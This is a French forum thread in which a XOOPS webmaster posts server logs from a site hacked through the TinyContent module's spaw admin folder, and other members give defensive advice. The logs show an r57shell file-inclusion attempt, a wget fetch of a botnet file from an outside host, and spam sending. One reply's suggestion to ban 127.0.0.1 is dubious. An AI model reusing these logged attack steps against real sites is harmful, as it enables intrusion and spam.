Faille de Sécurité dans TinyContent ( Votre site Fait du Spam ) [Forum - Règles et savoir-vivre sur FrXoops] - Communauté Francophone des Utilisateurs de Xoops

Inscription

Index des forums Communauté Francophone des Utilisateurs de Xoops - Support Général

Règles et savoir-vivre sur FrXoops

Résolu : Faille de Sécurité dans TinyContent ( Votre site Fait du Spam )

Bas

Suivant S'enregistrer pour contribuer

Guitariste	Faille de Sécurité dans TinyContent ( Votre site Fait du Spam )	#1
Semi pro Inscrit: 06/09/2005 11:47 De Barcelone - Espagne Messages: 691	BINGO !!! selon les logs Error j'ai trouvé ça Citation : qmail-inject: fatal: unable to parse this line: To: (webmaster@ibge.gov.br qmail-inject: fatal: unable to parse this line: To: mailto:rosi.santos@mackenzie.com.br qmail-inject: fatal: unable to parse this line: To: (Sarah.Holt@ucd.ie qmail-inject: fatal: unable to parse this line: To: mailto:arecusani@yahoo.com.br qmail-inject: fatal: unable to parse this line: To: mailto:asfambrini@ig.com.br sh: sysctl: command not found sh: sysctl: command not found sh: sysctl: command not found sh: sysctl: command not found [Mon May 14 07:16:30 2007] [error] [client 201.27.165.105] File does not exist: /home/anas/web/www/modules/tinycontent/admin/spaw/\\"http:/127.0.0.1/r57shell/version.php sh: sysctl: command not found sh: sysctl: command not found sh: sysctl: command not found sh: sysctl: command not found [Mon May 14 07:16:40 2007] [error] [client 201.27.165.105] File does not exist: /home/anas/web/www/modules/tinycontent/admin/spaw/\\"http:/127.0.0.1/r57shell/version.php --07:46:24-- http://www.facepi.com.br/cache/.../botnet/out.txt => `out.txt' Resolving www.facepi.com.br... 200.185.126.107 Connecting to www.facepi.com.br\|200.185.126.107\|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 28,710 (28K) [text/plain] 0K .......... .......... ... comme vous voyez c'est ici où on a penetré : modules/tinycontent/admin/spaw/ on a arrivé à installé /.sys lol alors il suffit de détruire ce dossier et vérifier les permissions quels nazes :-o Posté le : 17/05/2007 17:40 Edité par blueteen sur 17/05/2007 20:00:34
	La plupart des questions sur Xoops ont des réponses dans le eBook: Bien débuter avec Xoops

blueteen	Re: Faille de Sécurité dans TinyContent ( Votre site Fait du Spam )	#2
Xoops accro Inscrit: 15/07/2004 11:16 Messages: 4763	d'où l'intérêt de tenir les modules à jour. d'utiliser protector. et en complément, de protéger l'accès à l'administration avec un .htaccess comme ça, si une personne essaie d'accéder à un lien direct elle sera bloquée par la demande d'identification (utiliser un autre mot de passe que celui de votre compte administrateur). pour ceux qui n'auraient pas suivi, ton message fait référence à ce post et celui-ci. Posté le : 17/05/2007 19:58
Xoops accro Inscrit: 15/07/2004 11:16 Messages: 4763

Guitariste	Re: Faille de Sécurité dans TinyContent ( Votre site Fait du Spam )	#3
Semi pro Inscrit: 06/09/2005 11:47 De Barcelone - Espagne Messages: 691	Si t'as pas remarqué dans les logs : http:/127.0.0.1/r57shell/version.php on dirait que l'un des autres webmasters de mon site, a désactivé le ban de l'ip 127.0.0.1 , si j'ai bien compris ^^ allezzzzzzz BAN 127.0.0.1 Posté le : 17/05/2007 20:03
	La plupart des questions sur Xoops ont des réponses dans le eBook: Bien débuter avec Xoops

Guitariste	Re: Faille de Sécurité dans TinyContent ( Votre site Fait du Spam )	#4
Semi pro Inscrit: 06/09/2005 11:47 De Barcelone - Espagne Messages: 691	autre faille : Citation : /modules/tinycontent/admin/spaw/lib/toolbars/sidetable/by_dom.php by_dom.php = fichier uploadé ^^ Posté le : 31/05/2007 22:25
	La plupart des questions sur Xoops ont des réponses dans le eBook: Bien débuter avec Xoops

Haut

S'enregistrer pour contribuer

Vous pouvez voir les sujets.

Vous ne pouvez pas débuter de nouveaux sujets.

Vous ne pouvez pas répondre aux contributions.

Vous ne pouvez pas éditer vos contributions.

Vous ne pouvez pas effacez vos contributions.

Vous ne pouvez pas ajouter de nouveaux sondages.

Vous ne pouvez pas voter en sondage.

Vous ne pouvez pas attacher des fichiers à vos contributions.

Vous ne pouvez pas poster sans approbation.

Propulsé avec XOOPS | Graphisme adapté par Tatane, Grosdunord, Montuy337513

61 Personne(s) en ligne (50 Personne(s) connectée(s) sur Forum) | Utilisateur(s): 0 | Invité(s): 61 | Plus ...